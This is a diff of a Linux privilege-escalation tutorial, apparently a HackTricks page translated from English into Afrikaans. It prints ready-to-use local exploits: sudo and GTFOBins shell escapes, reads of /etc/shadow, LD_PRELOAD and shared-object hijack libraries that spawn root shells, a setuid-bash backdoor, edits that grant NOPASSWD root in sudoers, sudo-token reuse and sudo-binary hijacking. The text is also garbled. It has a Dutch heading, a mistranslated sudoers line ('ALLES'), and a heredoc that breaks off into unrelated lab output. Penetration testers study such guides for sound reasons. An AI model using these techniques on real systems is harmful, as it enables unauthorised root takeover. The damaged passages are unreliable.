@@ -727,30 +760,24 @@ cat /etc/networks #Files used by network services lsof -i ``` +### Oop poorte -### Open ports - -Always check network services running on the machine that you weren't able to interact with before accessing it: - +Kyk altyd na netwerkdienste wat op die masjien loop en waarmee jy nie voorheen kon interaksie hê nie voordat jy dit toegang gee: ```bash (netstat -punta || ss --ntpu) (netstat -punta || ss --ntpu) | grep "127.0" ``` +### Snuffel -### Sniffing - -Check if you can sniff traffic. If you can, you could be able to grab some credentials. - +Kyk of jy verkeer kan snuffel. As jy dit kan doen, kan jy dalk in staat wees om sekere geloofsbriewe te gryp. ``` timeout 1 tcpdump ``` +## Gebruikers -## Users - -### Generic Enumeration - -Check **who** you are, which **privileges** do you have, which **users** are in the systems, which ones can **login** and which ones have **root privileges:** +### Algemene Enumerasie +Kyk **wie** jy is, watter **voorregte** het jy, watter **gebruikers** is in die stelsels, watter een kan **aanmeld** en watter een het **root-voorregte:** ```bash #Info about me id || (whoami && groups) 2>/dev/null 
@@ -772,67 +799,69 @@ for i in $(cut -d":" -f1 /etc/passwd 2>/dev/null);do id $i;done 2>/dev/null | so #Current user PGP keys gpg --list-keys 2>/dev/null ``` +### Groot UID -### Big UID +Sommige Linux-weergawes is geraak deur 'n fout wat gebruikers met **UID > INT\_MAX** toelaat om voorregte te verhoog. Meer inligting: [hier](https://gitlab.freedesktop.org/polkit/polkit/issues/74), [hier](https://github.com/mirchr/security-research/blob/master/vulnerabilities/CVE-2018-19788.sh) en [hier](https://twitter.com/paragonsec/status/1071152249529884674).\ +**Exploiteer dit** met behulp van: **`systemd-run -t /bin/bash`** -Some Linux versions were affected by a bug that allows users with **UID > INT\_MAX** to escalate privileges. More info: [here](https://gitlab.freedesktop.org/polkit/polkit/issues/74), [here](https://github.com/mirchr/security-research/blob/master/vulnerabilities/CVE-2018-19788.sh) and [here](https://twitter.com/paragonsec/status/1071152249529884674).\ -**Exploit it** using: **`systemd-run -t /bin/bash`** +### Groepe -### Groups - -Check if you are a **member of some group** that could grant you root privileges: +Kyk of jy 'n **lid van 'n groep** is wat jou root-voorregte kan gee: {% content-ref url="interesting-groups-linux-pe/" %} [interesting-groups-linux-pe](interesting-groups-linux-pe/) {% endcontent-ref %} -### Clipboard - -Check if anything interesting is located inside the clipboard (if possible) +### Knipbord +Kyk of daar iets interessants binne die knipbord is (indien moontlik) ```bash if [ `which xclip 2>/dev/null` ]; then - echo "Clipboard: "`xclip -o -selection clipboard 2>/dev/null` - echo "Highlighted text: "`xclip -o 2>/dev/null` - elif [ `which xsel 2>/dev/null` ]; then - echo "Clipboard: "`xsel -ob 2>/dev/null` - echo "Highlighted text: "`xsel -o 2>/dev/null` - else echo "Not found xsel and xclip" - fi +echo "Clipboard: "`xclip -o -selection clipboard 2>/dev/null` +echo "Highlighted text: "`xclip -o 2>/dev/null` +elif [ `which xsel 
2>/dev/null` ]; then +echo "Clipboard: "`xsel -ob 2>/dev/null` +echo "Highlighted text: "`xsel -o 2>/dev/null` +else echo "Not found xsel and xclip" +fi ``` +### Wagwoordbeleid -### Password Policy +'n Wagwoordbeleid is 'n belangrike aspek van die beveiliging van 'n Linux-stelsel. Dit stel die vereistes en beperkings vir die skep en gebruik van wagwoorde op die stelsel. Hier is 'n paar belangrike punte om in gedagte te hou wanneer dit kom by 'n wagwoordbeleid: +- **Lengte**: Die lengte van 'n wagwoord moet voldoende lank wees om dit moeilik te maak vir aanvallers om te raai. Dit word aanbeveel dat wagwoorde ten minste 8 karakters lank moet wees. +- **Kompleksiteit**: Wagwoorde moet kompleks wees en 'n kombinasie van hoofletters, kleinletters, syfers en spesiale karakters insluit. Dit maak dit moeiliker vir aanvallers om wagwoorde te kraak deur middel van kragtige aanvalle. +- **Verandering van wagwoorde**: Dit is belangrik om gebruikers te dwing om hul wagwoorde gereeld te verander. Dit verminder die risiko van 'n aanvaller wat 'n wagwoord verkry en dit vir 'n lang tydperk gebruik. +- **Wagwoordhergebruik**: Gebruikers moet aangemoedig word om nie dieselfde wagwoord vir verskillende rekeninge te gebruik nie. Dit verminder die risiko van 'n aanvaller wat toegang tot al die rekeninge verkry as een wagwoord gekraak word. +- **Wagwoordhantering**: Gebruikers moet bewus gemaak word van die belangrikheid van die veilige hantering van hul wagwoorde. Dit sluit in om wagwoorde nie met ander te deel nie en om hulle wagwoorde veilig te stoor. + +Deur 'n streng wagwoordbeleid te implementeer en gebruikers op te voed oor die belangrikheid van veilige wagwoordpraktyke, kan die risiko van wagwoordgebaseerde aanvalle op 'n Linux-stelsel verminder word. 
```bash grep "^PASS_MAX_DAYS\|^PASS_MIN_DAYS\|^PASS_WARN_AGE\|^ENCRYPT_METHOD" /etc/login.defs ``` +### Bekende wagwoorde -### Known passwords - -If you **know any password** of the environment **try to login as each user** using the password. +As jy enige wagwoord van die omgewing **ken**, probeer om as elke gebruiker in te teken met die wagwoord. ### Su Brute -If don't mind about doing a lot of noise and `su` and `timeout` binaries are present on the computer, you can try to brute-force user using [su-bruteforce](https://github.com/carlospolop/su-bruteforce).\ -[**Linpeas**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite) with `-a` parameter also try to brute-force users. +As jy nie omgee om baie geraas te maak nie en die `su` en `timeout` binêre lêers op die rekenaar teenwoordig is, kan jy probeer om gebruikers te brute-force deur [su-bruteforce](https://github.com/carlospolop/su-bruteforce) te gebruik.\ +[**Linpeas**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite) met die `-a` parameter probeer ook om gebruikers te brute-force. -## Writable PATH abuses +## Skryfbare PATH-misbruik ### $PATH -If you find that you can **write inside some folder of the $PATH** you may be able to escalate privileges by **creating a backdoor inside the writable folder** with the name of some command that is going to be executed by a different user (root ideally) and that is **not loaded from a folder that is located previous** to your writable folder in $PATH. +As jy vind dat jy kan **skryf binne 'n sekere vouer van die $PATH**, kan jy bevoorregting verhoog deur **'n agterdeur te skep binne die skryfbare vouer** met die naam van 'n bevel wat deur 'n ander gebruiker (idealiter root) uitgevoer gaan word en wat **nie gelaai word vanaf 'n vouer wat voor jou skryfbare vouer in $PATH geleë is nie**. -### SUDO and SUID - -You could be allowed to execute some command using sudo or they could have the suid bit. 
Check it using: +### SUDO en SUID +Jy kan toegelaat word om 'n bevel uit te voer met behulp van sudo of hulle kan die suid-bit hê. Kontroleer dit deur die volgende te gebruik: ```bash sudo -l #Check commands you can execute with sudo find / -perm -4000 2>/dev/null #Find all SUID binaries ``` - -Some **unexpected commands allow you to read and/or write files or even execute a command.** For example: - +Sommige **onverwagte opdragte stel jou in staat om lêers te lees en/of skryf, of selfs 'n opdrag uit te voer.** Byvoorbeeld: ```bash sudo awk 'BEGIN {system("/bin/sh")}' sudo find /etc -exec sh -i \; 
@@ -841,43 +870,33 @@ sudo tar c a.tar -I ./runme.sh a ftp>!/bin/sh less>! ``` - ### NOPASSWD -Sudo configuration might allow a user to execute some command with another user's privileges without knowing the password. - +Sudo-konfigurasie mag 'n gebruiker toelaat om 'n bepaalde opdrag uit te voer met die voorregte van 'n ander gebruiker sonder om die wagwoord te weet nie. ``` $ sudo -l User demo may run the following commands on crashlab: - (root) NOPASSWD: /usr/bin/vim +(root) NOPASSWD: /usr/bin/vim ``` - -In this example the user `demo` can run `vim` as `root`, it is now trivial to get a shell by adding an ssh key into the root directory or by calling `sh`. - +In hierdie voorbeeld kan die gebruiker `demo` `vim` as `root` uitvoer, dit is nou maklik om 'n skulp te kry deur 'n ssh-sleutel in die root-gids te voeg of deur `sh` te roep. ``` sudo vim -c '!sh' ``` - ### SETENV -This directive allows the user to **set an environment variable** while executing something: - +Hierdie riglyn stel die gebruiker in staat om **'n omgewingsveranderlike in te stel** terwyl iets uitgevoer word: ```bash $ sudo -l User waldo may run the following commands on admirer: - (ALL) SETENV: /opt/scripts/admin_tasks.sh +(ALL) SETENV: /opt/scripts/admin_tasks.sh ``` - -This example, **based on HTB machine Admirer**, was **vulnerable** to **PYTHONPATH hijacking** to load an arbitrary python library while executing the script as root: - +Hierdie voorbeeld, **gebaseer op die HTB-masjien Admirer**, was **kwesbaar** vir **PYTHONPATH-ontvoering** om 'n willekeurige Python-biblioteek te laai terwyl die skrip as root uitgevoer word: ```bash sudo PYTHONPATH=/dev/shm/ /opt/scripts/admin_tasks.sh ``` +### Sudo-uitvoering omzeilen via paden -### Sudo execution bypassing paths - -**Jump** to read other files or use **symlinks**. For example in sudoers file: _hacker10 ALL= (root) /bin/less /var/log/\*_ - +**Spring** om ander lêers te lees of **symlinks** te gebruik. 
Byvoorbeeld in die sudoers-lêer: _hacker10 ALLES= (root) /bin/less /var/log/\*_ ```bash sudo less /var/logs/anything less>:e /etc/shadow #Jump to read other files using privileged less 
@@ -887,90 +906,74 @@ less>:e /etc/shadow #Jump to read other files using privileged less ln /etc/shadow /var/log/new sudo less /var/log/new #Use symlinks to read any file ``` - -If a **wildcard** is used (\*), it is even easier: - +As 'n **wildcard** gebruik word (\*), is dit selfs makliker: ```bash sudo less /var/log/../../etc/shadow #Read shadow sudo less /var/log/something /etc/shadow #Red 2 files ``` +**Teenmaatreëls**: [https://blog.compass-security.com/2012/10/dangerous-sudoers-entries-part-5-recapitulation/](https://blog.compass-security.com/2012/10/dangerous-sudoers-entries-part-5-recapitulation/) -**Countermeasures**: [https://blog.compass-security.com/2012/10/dangerous-sudoers-entries-part-5-recapitulation/](https://blog.compass-security.com/2012/10/dangerous-sudoers-entries-part-5-recapitulation/) - -### Sudo command/SUID binary without command path - -If the **sudo permission** is given to a single command **without specifying the path**: _hacker10 ALL= (root) less_ you can exploit it by changing the PATH variable +### Sudo-opdrag/SUID-binêre sonder opdragpad +As die **sudo-toestemming** gegee word aan 'n enkele opdrag **sonder om die opdragpad te spesifiseer**: _hacker10 ALL= (root) less_, kan jy dit uitbuit deur die PATH-veranderlike te verander. ```bash export PATH=/tmp:$PATH #Put your backdoor in /tmp and name it "less" sudo less ``` +Hierdie tegniek kan ook gebruik word as 'n **suid** binêre lêer 'n ander opdrag uitvoer sonder om die pad daarna te spesifiseer (kontroleer altyd met **strings** die inhoud van 'n vreemde SUID binêre lêer). -This technique can also be used if a **suid** binary **executes another command without specifying the path to it (always check with** _**strings**_ **the content of a weird SUID binary)**. 
+[Voorbeelde van payloads om uit te voer.](payloads-to-execute.md) -[Payload examples to execute.](payloads-to-execute.md) +### SUID binêre lêer met opdraggewys -### SUID binary with command path - -If the **suid** binary **executes another command specifying the path**, then, you can try to **export a function** named as the command that the suid file is calling. - -For example, if a suid binary calls _**/usr/sbin/service apache2 start**_ you have to try to create the function and export it: +As die **suid** binêre lêer 'n ander opdrag uitvoer deur die pad te spesifiseer, kan jy probeer om 'n **funksie uit te voer** wat dieselfde naam as die opdrag wat die suid-lêer aanroep, het. +Byvoorbeeld, as 'n suid binêre lêer _**/usr/sbin/service apache2 start**_ aanroep, moet jy probeer om die funksie te skep en uit te voer: ```bash function /usr/sbin/service() { cp /bin/bash /tmp && chmod +s /tmp/bash && /tmp/bash -p; } export -f /usr/sbin/service ``` - -Then, when you call the suid binary, this function will be executed +Dan, wanneer jy die suid-binêre oproep, sal hierdie funksie uitgevoer word ### LD\_PRELOAD & **LD\_LIBRARY\_PATH** -The **LD_PRELOAD** environment variable is used to specify one or more shared libraries (.so files) to be loaded by the loader before all others, including the standard C library (`libc.so`). This process is known as preloading a library. +Die **LD_PRELOAD** omgewingsveranderlike word gebruik om een of meer gedeelde biblioteke (.so-lêers) aan te dui wat deur die laaier voor alle ander biblioteke, insluitend die standaard C-biblioteek (`libc.so`), gelaai moet word. Hierdie proses staan bekend as die voorlaai van 'n biblioteek. 
-However, to maintain system security and prevent this feature from being exploited, particularly with **suid/sgid** executables, the system enforces certain conditions: +Om egter stelselsekuriteit te handhaaf en te voorkom dat hierdie funksie uitgebuit word, veral met **suid/sgid** uitvoerbare lêers, dwing die stelsel sekere voorwaardes af: -- The loader disregards **LD_PRELOAD** for executables where the real user ID (_ruid_) does not match the effective user ID (_euid_). -- For executables with suid/sgid, only libraries in standard paths that are also suid/sgid are preloaded. - -Privilege escalation can occur if you have the ability to execute commands with `sudo` and the output of `sudo -l` includes the statement **env_keep+=LD_PRELOAD**. This configuration allows the **LD_PRELOAD** environment variable to persist and be recognized even when commands are run with `sudo`, potentially leading to the execution of arbitrary code with elevated privileges. +- Die laaier ignoreer **LD_PRELOAD** vir uitvoerbare lêers waar die werklike gebruikers-ID (_ruid_) nie ooreenstem met die effektiewe gebruikers-ID (_euid_) nie. +- Vir uitvoerbare lêers met suid/sgid word slegs biblioteke in standaard paaie wat ook suid/sgid is, voorafgelaai. +Privilege-escalatie kan plaasvind as jy die vermoë het om opdragte met `sudo` uit te voer en die uitset van `sudo -l` die verklaring **env_keep+=LD_PRELOAD** insluit. Hierdie konfigurasie maak dit moontlik vir die **LD_PRELOAD** omgewingsveranderlike om volhardend te wees en erken te word selfs wanneer opdragte met `sudo` uitgevoer word, wat moontlik kan lei tot die uitvoering van willekeurige kode met verhoogde bevoegdhede. 
``` Defaults env_keep += LD_PRELOAD ``` - -Save as **/tmp/pe.c** - +Stoor as **/tmp/pe.c** ```c #include #include #include void _init() { - unsetenv("LD_PRELOAD"); - setgid(0); - setuid(0); - system("/bin/bash"); +unsetenv("LD_PRELOAD"); +setgid(0); +setuid(0); +system("/bin/bash"); } ``` - -Then **compile it** using: - +Dan **kompileer dit** deur die volgende te gebruik: ```bash cd /tmp gcc -fPIC -shared -o pe.so pe.c -nostartfiles ``` - -Finally, **escalate privileges** running - +Uiteindelik, **verhoog voorregte** wat uitgevoer word ```bash sudo LD_PRELOAD=./pe.so #Use any command you can run with sudo ``` - {% hint style="danger" %} -A similar privesc can be abused if the attacker controls the **LD\_LIBRARY\_PATH** env variable because he controls the path where libraries are going to be searched. +'n Soortgelyke privesc kan misbruik word as die aanvaller beheer oor die **LD\_LIBRARY\_PATH** omgewingsveranderlike het, omdat hy die pad beheer waar biblioteke gesoek gaan word. {% endhint %} - ```c #include #include @@ -978,9 +981,9 @@ A similar privesc can be abused if the attacker controls the **LD\_LIBRARY\_PATH static void hijack() __attribute__((constructor)); void hijack() { - unsetenv("LD_LIBRARY_PATH"); - setresuid(0,0,0); - system("/bin/bash -p"); +unsetenv("LD_LIBRARY_PATH"); +setresuid(0,0,0); +system("/bin/bash -p"); } ``` 
@@ -990,19 +993,15 @@ cd /tmp gcc -o /tmp/libcrypt.so.1 -shared -fPIC /home/user/tools/sudo/library_path.c sudo LD_LIBRARY_PATH=/tmp ``` +### SUID-binêre - .so-injeksie -### SUID Binary – .so injection - -When encountering a binary with **SUID** permissions that seems unusual, it's a good practice to verify if it's loading **.so** files properly. This can be checked by running the following command: - +Wanneer jy 'n binêre lêer met **SUID**-permissies teëkom wat ongewoon lyk, is dit 'n goeie praktyk om te verifieer of dit **.so**-lêers behoorlik laai. Dit kan nagegaan word deur die volgende bevel uit te voer: ```bash strace 2>&1 | grep -i -E "open|access|no such file" ``` +Byvoorbeeld, wanneer jy 'n fout soos _"open(“/path/to/.config/libcalc.so”, O_RDONLY) = -1 ENOENT (No such file or directory)"_ teëkom, dui dit op 'n potensiële moontlikheid vir uitbuiting. -For instance, encountering an error like _"open(“/path/to/.config/libcalc.so”, O_RDONLY) = -1 ENOENT (No such file or directory)"_ suggests a potential for exploitation. - -To exploit this, one would proceed by creating a C file, say _"/path/to/.config/libcalc.c"_, containing the following code: - +Om hiervan gebruik te maak, sal jy voortgaan deur 'n C-lêer te skep, sê _"/path/to/.config/libcalc.c"_, wat die volgende kode bevat: ```c #include #include 
@@ -1010,23 +1009,19 @@ To exploit this, one would proceed by creating a C file, say _"/path/to/.config/ static void inject() __attribute__((constructor)); void inject(){ - system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p"); +system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p"); } ``` +Hierdie kode, sodra dit gekompileer en uitgevoer word, streef daarna om voorregte te verhoog deur lêerregte te manipuleer en 'n skulp met verhoogde voorregte uit te voer. -This code, once compiled and executed, aims to elevate privileges by manipulating file permissions and executing a shell with elevated privileges. - -Compile the above C file into a shared object (.so) file with: - +Kompileer die bogenoemde C-lêer na 'n gedeelde voorwerp (.so) lêer met: ```bash gcc -shared -o /path/to/.config/libcalc.so -fPIC /path/to/.config/libcalc.c ``` - -Finally, running the affected SUID binary should trigger the exploit, allowing for potential system compromise. +Uiteindelik, die uitvoering van die geaffekteerde SUID-binêre lêer moet die uitbuiting aktiveer, wat potensiële sisteem-oortreding moontlik maak. -## Shared Object Hijacking - +## Gedeelde Objek Kaping ```bash # Lets find a SUID using a non-standard library ldd some_suid @@ -1036,9 +1031,7 @@ something.so => /lib/x86_64-linux-gnu/something.so readelf -d payroll | grep PATH 0x000000000000001d (RUNPATH) Library runpath: [/development] ``` - -Now that we have found a SUID binary loading a library from a folder where we can write, lets create the library in that folder with the necessary name: - +Nou dat ons 'n SUID-binêre lêer gevind het wat 'n biblioteek laai van 'n vouer waarin ons kan skryf, laat ons die biblioteek in daardie vouer skep met die nodige naam: ```c //gcc src.c -fPIC -shared -o /development/libshared.so #include 
@@ -1047,24 +1040,21 @@ Now that we have found a SUID binary loading a library from a folder where we ca static void hijack() __attribute__((constructor)); void hijack() { - setresuid(0,0,0); - system("/bin/bash -p"); +setresuid(0,0,0); +system("/bin/bash -p"); } ``` - -If you get an error such as - +As jy 'n fout soos die volgende kry: ```shell-session ./suid_bin: symbol lookup error: ./suid_bin: undefined symbol: a_function_name ``` - -that means that the library you have generated need to have a function called `a_function_name`. +Dit beteken dat die biblioteek wat jy gegenereer het 'n funksie genaamd `a_function_name` moet hê. ### GTFOBins -[**GTFOBins**](https://gtfobins.github.io) is a curated list of Unix binaries that can be exploited by an attacker to bypass local security restrictions. [**GTFOArgs**](https://gtfoargs.github.io/) is the same but for cases where you can **only inject arguments** in a command. +[**GTFOBins**](https://gtfobins.github.io) is 'n saamgestelde lys van Unix-binêre lêers wat deur 'n aanvaller uitgebuit kan word om plaaslike sekuriteitsbeperkings te omseil. [**GTFOArgs**](https://gtfoargs.github.io/) is dieselfde, maar vir gevalle waar jy slegs argumente kan inspuit in 'n opdrag. -The project collects legitimate functions of Unix binaries that can be abused to break out restricted shells, escalate or maintain elevated privileges, transfer files, spawn bind and reverse shells, and facilitate the other post-exploitation tasks. +Die projek versamel wettige funksies van Unix-binêre lêers wat misbruik kan word om beperkte skille te deurgrond, voorregte te verhoog of te handhaaf, lêers oor te dra, bind- en omgekeerde skille te skep, en die ander naseksploitasietake te fasiliteer. > gdb -nx -ex '!sh' -ex quit\ > sudo mysql -e '! /bin/sh'\ 
@@ -1077,96 +1067,79 @@ The project collects legitimate functions of Unix binaries that can be abused to ### FallOfSudo -If you can access `sudo -l` you can use the tool [**FallOfSudo**](https://github.com/CyberOne-Security/FallofSudo) to check if it finds how to exploit any sudo rule. +As jy toegang het tot `sudo -l`, kan jy die instrument [**FallOfSudo**](https://github.com/CyberOne-Security/FallofSudo) gebruik om te kyk of dit enige sudo-reël kan uitbuit. -### Reusing Sudo Tokens +### Hergebruik van Sudo Tokens -In cases where you have **sudo access** but not the password, you can escalate privileges by **waiting for a sudo command execution and then hijacking the session token**. +In gevalle waar jy **sudo-toegang** het, maar nie die wagwoord nie, kan jy voorregte verhoog deur **te wag vir 'n sudo-opdraguitvoering en dan die sessietoken te kaap**. -Requirements to escalate privileges: +Vereistes om voorregte te verhoog: -* You already have a shell as user "_sampleuser_" -* "_sampleuser_" have **used `sudo`** to execute something in the **last 15mins** (by default that's the duration of the sudo token that allows us to use `sudo` without introducing any password) +* Jy het reeds 'n skil as gebruiker "_sampleuser_" +* "_sampleuser_" het **`sudo` gebruik** om iets in die **laaste 15 minute** uit te voer (standaard is dit die duur van die sudo-token wat ons toelaat om `sudo` te gebruik sonder om enige wagwoord in te voer) * `cat /proc/sys/kernel/yama/ptrace_scope` is 0 -* `gdb` is accessible (you can be able to upload it) +* `gdb` is toeganklik (jy moet dit kan oplaai) -(You can temporarily enable `ptrace_scope` with `echo 0 | sudo tee /proc/sys/kernel/yama/ptrace_scope` or permanently modifying `/etc/sysctl.d/10-ptrace.conf` and setting `kernel.yama.ptrace_scope = 0`) +(Jy kan `ptrace_scope` tydelik aktiveer met `echo 0 | sudo tee /proc/sys/kernel/yama/ptrace_scope` of permanent deur `/etc/sysctl.d/10-ptrace.conf` te wysig en `kernel.yama.ptrace_scope = 0` in te 
stel) -If all these requirements are met, **you can escalate privileges using:** [**https://github.com/nongiach/sudo\_inject**](https://github.com/nongiach/sudo\_inject) - -* The **first exploit** (`exploit.sh`) will create the binary `activate_sudo_token` in _/tmp_. You can use it to **activate the sudo token in your session** (you won't get automatically a root shell, do `sudo su`): +As al hierdie vereistes voldoen word, **kan jy voorregte verhoog deur gebruik te maak van:** [**https://github.com/nongiach/sudo\_inject**](https://github.com/nongiach/sudo\_inject) +* Die **eerste uitbuiting** (`exploit.sh`) sal die binêre lêer `activate_sudo_token` in _/tmp_ skep. Jy kan dit gebruik om die sudo-token in jou sessie te **aktiveer** (jy sal nie outomaties 'n root-skil kry nie, doen `sudo su`): ```bash bash exploit.sh /tmp/activate_sudo_token sudo su ``` - -* The **second exploit** (`exploit_v2.sh`) will create a sh shell in _/tmp_ **owned by root with setuid** - +* Die **tweede uitbuiting** (`exploit_v2.sh`) sal 'n sh-skulp in _/tmp_ skep **wat deur root besit word met setuid** ```bash bash exploit_v2.sh /tmp/sh -p ``` - -* The **third exploit** (`exploit_v3.sh`) will **create a sudoers file** that makes **sudo tokens eternal and allows all users to use sudo** - +*Die **derde aanval** (`exploit_v3.sh`) sal 'n sudoers-lêer **skep wat sudo-tokens ewig maak en alle gebruikers toelaat om sudo te gebruik**.* ```bash bash exploit_v3.sh sudo su ``` +### /var/run/sudo/ts/\ -### /var/run/sudo/ts/\ - -If you have **write permissions** in the folder or on any of the created files inside the folder you can use the binary [**write\_sudo\_token**](https://github.com/nongiach/sudo\_inject/tree/master/extra\_tools) to **create a sudo token for a user and PID**.\ -For example, if you can overwrite the file _/var/run/sudo/ts/sampleuser_ and you have a shell as that user with PID 1234, you can **obtain sudo privileges** without needing to know the password doing: - +As jy **skryfregte** 
het in die vouer of op enige van die geskepte lêers binne die vouer, kan jy die binêre [**write\_sudo\_token**](https://github.com/nongiach/sudo\_inject/tree/master/extra\_tools) gebruik om 'n sudo-token vir 'n gebruiker en PID te **skep**.\ +Byvoorbeeld, as jy die lêer _/var/run/sudo/ts/sampleuser_ kan oorskryf en jy het 'n skulp as daardie gebruiker met PID 1234, kan jy **sudo-voorregte verkry** sonder om die wagwoord te weet deur die volgende te doen: ```bash ./write_sudo_token 1234 > /var/run/sudo/ts/sampleuser ``` - ### /etc/sudoers, /etc/sudoers.d -The file `/etc/sudoers` and the files inside `/etc/sudoers.d` configure who can use `sudo` and how. These files **by default can only be read by user root and group root**.\ -**If** you can **read** this file you could be able to **obtain some interesting information**, and if you can **write** any file you will be able to **escalate privileges**. - +Die lêer `/etc/sudoers` en die lêers binne `/etc/sudoers.d` stel in wie `sudo` kan gebruik en hoe. Hierdie lêers **kan standaard slegs deur gebruiker root en groep root gelees word**.\ +**As** jy hierdie lêer **kan lees**, kan jy moontlik **interessante inligting bekom**, en as jy enige lêer **kan skryf**, kan jy bevoorregtinge **verhoog**. ```bash ls -l /etc/sudoers /etc/sudoers.d/ ls -ld /etc/sudoers.d/ ``` - -If you can write you can abuse this permission - +As jy kan skryf, kan jy hierdie toestemming misbruik. 
```bash echo "$(whoami) ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers echo "$(whoami) ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers.d/README ``` - -Another way to abuse these permissions: - +'n Ander manier om hierdie toestemmings te misbruik: ```bash -# makes it so every terminal can sudo +# makes it so every terminal can sudo echo "Defaults !tty_tickets" > /etc/sudoers.d/win # makes it so sudo never times out echo "Defaults timestamp_timeout=-1" >> /etc/sudoers.d/win ``` - ### DOAS -There are some alternatives to the `sudo` binary such as `doas` for OpenBSD, remember to check its configuration at `/etc/doas.conf` - +Daar is alternatiewe vir die `sudo` binêre lêer soos `doas` vir OpenBSD, onthou om sy konfigurasie te kontroleer by `/etc/doas.conf` ``` permit nopass demo as root cmd vim ``` +### Sudo Oorname -### Sudo Hijacking +As jy weet dat 'n **gebruiker gewoonlik met 'n masjien verbind en `sudo` gebruik** om voorregte te verhoog en jy het 'n skaal binne daardie gebruiker se konteks, kan jy **'n nuwe sudo uitvoerbare lêer skep** wat jou kode as root sal uitvoer en dan die gebruiker se bevel. Verander dan die $PATH van die gebruiker se konteks (byvoorbeeld deur die nuwe pad in .bash\_profile by te voeg), sodat wanneer die gebruiker sudo uitvoer, jou sudo uitvoerbare lêer uitgevoer word. -If you know that a **user usually connects to a machine and uses `sudo`** to escalate privileges and you got a shell within that user context, you can **create a new sudo executable** that will execute your code as root and then the user's command. Then, **modify the $PATH** of the user context (for example adding the new path in .bash\_profile) so when the user executes sudo, your sudo executable is executed. - -Note that if the user uses a different shell (not bash) you will need to modify other files to add the new path. For example[ sudo-piggyback](https://github.com/APTy/sudo-piggyback) modifies `~/.bashrc`, `~/.zshrc`, `~/.bash_profile`. 
You can find another example in [bashdoor.py](https://github.com/n00py/pOSt-eX/blob/master/empire\_modules/bashdoor.py) - -Or running something like: +Let daarop dat as die gebruiker 'n ander skil (nie bash nie) gebruik, jy ander lêers moet wysig om die nuwe pad by te voeg. Byvoorbeeld, [sudo-piggyback](https://github.com/APTy/sudo-piggyback) wysig `~/.bashrc`, `~/.zshrc`, `~/.bash_profile`. Jy kan 'n ander voorbeeld vind in [bashdoor.py](https://github.com/n00py/pOSt-eX/blob/master/empire\_modules/bashdoor.py) +Of voer iets soos die volgende uit: ```bash cat >/tmp/sudo < (0x0068c000) - libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0x00110000) - /lib/ld-linux.so.2 (0x005bb000) +linux-gate.so.1 => (0x0068c000) +libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0x00110000) +/lib/ld-linux.so.2 (0x005bb000) ``` - -By copying the lib into `/var/tmp/flag15/` it will be used by the program in this place as specified in the `RPATH` variable. - +Deur die lib na `/var/tmp/flag15/` te kopieer, sal die program dit gebruik op hierdie plek soos gespesifiseer in die `RPATH` veranderlike. 
``` level15@nebula:/home/flag15$ cp /lib/i386-linux-gnu/libc.so.6 /var/tmp/flag15/ level15@nebula:/home/flag15$ ldd ./flag15 - linux-gate.so.1 => (0x005b0000) - libc.so.6 => /var/tmp/flag15/libc.so.6 (0x00110000) - /lib/ld-linux.so.2 (0x00737000) +linux-gate.so.1 => (0x005b0000) +libc.so.6 => /var/tmp/flag15/libc.so.6 (0x00110000) +/lib/ld-linux.so.2 (0x00737000) ``` - -Then create an evil library in `/var/tmp` with `gcc -fPIC -shared -static-libgcc -Wl,--version-script=version,-Bstatic exploit.c -o libc.so.6` - +Maak dan 'n kwaadwillige biblioteek in `/var/tmp` met `gcc -fPIC -shared -static-libgcc -Wl,--version-script=version,-Bstatic exploit.c -o libc.so.6` ```c #include #define SHELL "/bin/sh" int __libc_start_main(int (*main) (int, char **, char **), int argc, char ** ubp_av, void (*init) (void), void (*fini) (void), void (*rtld_fini) (void), void (* stack_end)) { - char *file = SHELL; - char *argv[] = {SHELL,0}; - setresuid(geteuid(),geteuid(), geteuid()); - execve(file,argv,0); +char *file = SHELL; +char *argv[] = {SHELL,0}; +setresuid(geteuid(),geteuid(), geteuid()); +execve(file,argv,0); } ``` +## Vermoëns -## Capabilities - -Linux capabilities provide a **subset of the available root privileges to a process**. This effectively breaks up root **privileges into smaller and distinctive units**. Each of these units can then be independently granted to processes. This way the full set of privileges is reduced, decreasing the risks of exploitation.\ -Read the following page to **learn more about capabilities and how to abuse them**: +Linux-vermoëns bied 'n **subgroep van die beskikbare root-voorregte aan 'n proses**. Dit breek effektief root-voorregte op in kleiner en onderskeidende eenhede. Elkeen van hierdie eenhede kan dan onafhanklik aan prosesse toegeken word. 
Op hierdie manier word die volledige stel voorregte verminder, wat die risiko van uitbuiting verminder.\ +Lees die volgende bladsy om **meer te wete te kom oor vermoëns en hoe om dit te misbruik**: {% content-ref url="linux-capabilities.md" %} [linux-capabilities.md](linux-capabilities.md) {% endcontent-ref %} -## Directory permissions +## Gidsbevoegdhede -In a directory, the **bit for "execute"** implies that the user affected can "**cd**" into the folder.\ -The **"read"** bit implies the user can **list** the **files**, and the **"write"** bit implies the user can **delete** and **create** new **files**. +In 'n gids impliseer die **bit vir "uitvoer"** dat die betrokke gebruiker kan "**cd**" na die gids.\ +Die **"lees"** bit impliseer dat die gebruiker die **lêerlys** kan **lys**, en die **"skryf"** bit impliseer dat die gebruiker **lêers** kan **verwyder** en **nuwe lêers** kan **skep**. -## ACLs +## ACL's -Access Control Lists (ACLs) represent the secondary layer of discretionary permissions, capable of **overriding the traditional ugo/rwx permissions**. These permissions enhance control over file or directory access by allowing or denying rights to specific users who are not the owners or part of the group. This level of **granularity ensures more precise access management**. Further details can be found [**here**](https://linuxconfig.org/how-to-manage-acls-on-linux). - -**Give** user "kali" read and write permissions over a file: +Toegangsbeheerlyste (ACL's) verteenwoordig die sekondêre laag van diskresionêre bevoegdhede, wat in staat is om die tradisionele ugo/rwx-bevoegdhede te **oorheers**. Hierdie bevoegdhede verbeter die beheer oor toegang tot lêers of gids deur regte toe te laat of te weier aan spesifieke gebruikers wat nie die eienaars of deel van die groep is nie. Hierdie vlak van **fynkorrelige beheer verseker meer presiese toegangsbestuur**. Verdere besonderhede kan [**hier**](https://linuxconfig.org/how-to-manage-acls-on-linux) gevind word. 
